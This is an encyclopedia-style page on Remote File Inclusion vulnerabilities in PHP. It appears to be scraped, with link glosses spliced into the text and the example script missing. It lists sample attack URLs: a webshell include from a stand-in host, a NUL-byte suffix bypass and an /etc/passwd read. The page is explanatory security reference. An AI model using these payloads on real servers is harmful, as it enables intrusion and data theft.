Remote File Inclusion
Encyclopedia
Remote File Inclusion is a type of vulnerability
most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server
. The vulnerability
occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
the main cause is due to the use of unvalidated
external variables
such as $_GET, $_POST, $_COOKIE with a filesystem function. Most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive, and if enabled it allows filesystem functions to use a URL
which allows them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability, all user input needs to be validated before being used.
script (which includes a file specified by request):
The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in
Vulnerability (computing)
In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw...
most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server
Web server
Web server can refer to either the hardware or the software that helps to deliver content that can be accessed through the Internet....
. The vulnerability
Vulnerability (computing)
In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw...
occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
- Code execution on the web serverWeb serverWeb server can refer to either the hardware or the software that helps to deliver content that can be accessed through the Internet....
- Code execution on the client-sideClient-sideClient-side refers to operations that are performed by the client in a client–server relationship in a computer network.Typically, a client is a computer application, such as a web browser, that runs on a user's local computer or workstation and connects to a server as necessary...
such as JavaScriptJavaScriptJavaScript is a prototype-based scripting language that is dynamic, weakly typed and has first-class functions. It is a multi-paradigm language, supporting object-oriented, imperative, and functional programming styles....
which can lead to other attacks such as cross site scripting (XSS). - Denial of Service (DoS)
- Data TheftData theftData theft is a growing problem primarily perpetrated by office workers with access to technology such as desktop computers and hand-held devices capable of storing digital information such as USB flash drives, iPods and even digital cameras...
/Manipulation
PHP
In PHPPHP
PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document...
the main cause is due to the use of unvalidated
Secure input and output handling
Secure input and output handling are secure programming techniques designed to prevent security bugs and the exploitation thereof.- Input handling :...
external variables
Variable (programming)
In computer programming, a variable is a symbolic name given to some known or unknown quantity or information, for the purpose of allowing the name to be used independently of the information it represents...
such as $_GET, $_POST, $_COOKIE with a filesystem function. Most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive, and if enabled it allows filesystem functions to use a URL
Uniform Resource Locator
In computing, a uniform resource locator or universal resource locator is a specific character string that constitutes a reference to an Internet resource....
which allows them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability, all user input needs to be validated before being used.
Example
Consider this PHPPHP
PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document...
script (which includes a file specified by request):
The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in
COLOR
, it is possible to inject code from files:
-
/vulnerable.php?COLOR=
- injects a remotely hosted file containing a malicious code.http://evil.example.com/webshell.txt? -
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
- Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability) -
/vulnerable.php?COLOR=C:\\notes.txt%00
- example using NULNull characterThe null character , abbreviated NUL, is a control character with the value zero.It is present in many character sets, including ISO/IEC 646 , the C0 control code, the Universal Character Set , and EBCDIC...
meta character to remove the.php
suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the NUL terminatorNull characterThe null character , abbreviated NUL, is a control character with the value zero.It is present in many character sets, including ISO/IEC 646 , the C0 control code, the Universal Character Set , and EBCDIC...
) -
/vulnerable.php?COLOR=/etc/passwd%00
- allows an attacker to read the contents of the passwd file on a UNIXUnixUnix is a multitasking, multi-user computer operating system originally developed in 1969 by a group of AT&T employees at Bell Labs, including Ken Thompson, Dennis Ritchie, Brian Kernighan, Douglas McIlroy, and Joe Ossanna...
system directory traversalDirectory traversalA directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs....
.
Known Real World Examples
- In May 2011, ImpervaImpervaImperva , is a data security company headquartered in the United States, which provides solutions for high-value business data protection and prevents sensitive data theft from hackers and malicious insiders by securing data across three main areas: databases, file systems, and web...
’s ADC wrote a comprehensive description of how RFI works and how to avoid it . - In June 2011, the LulzsecLulzSecLulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline...
attacks relied heavily on RFI, which is described in this ImpervaImpervaImperva , is a data security company headquartered in the United States, which provides solutions for high-value business data protection and prevents sensitive data theft from hackers and malicious insiders by securing data across three main areas: databases, file systems, and web...
blog
See also
- Attack (computer)Attack (computer)In computer and computer networks an attack is any attempt to destroy, expose, alter, disable, steal or gain unauthorized access to or make unauthorized use of an asset.- IETF :Internet Engineering Task Force defines attack in RFC 2828 as:...
- Code injectionCode injectionCode injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce code into a computer program to change the course of execution. The results of a code injection attack can be disastrous...
- Cross-site scriptingCross-site scriptingCross-site scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same...
- Metasploit ProjectMetasploit ProjectThe Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development....
, an open-source penetration testing tool that includes tests for RFI - SQL injectionSQL injectionA SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker. SQL injection is a code injection technique that exploits a security vulnerability in a website's software...
- Threat (computer)Threat (computer)In Computer security a threat is a possible danger that might exploit a vulnerability to breach security and thus cause possible harm.A threat can be either "intentional" or "accidental" In Computer security a threat is a possible danger that might exploit a vulnerability to breach security and...
- Vulnerability (computing)Vulnerability (computing)In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw...
- w3afW3afw3af is an open-source web application security scanner. The project provides a vulnerability scanner and exploitation tool for Web applications...
, an open-source web application security scanner - Include vulnerabilityInclude vulnerabilityA server-side include vulnerability is a vulnerability that may allow an attacker to execute arbitrary scripts on a host server by causing an existing script to include an arbitrary file...
External links
- Remote File Inclusion Vulnerabilities The Web Application Security Consortium Threat Classification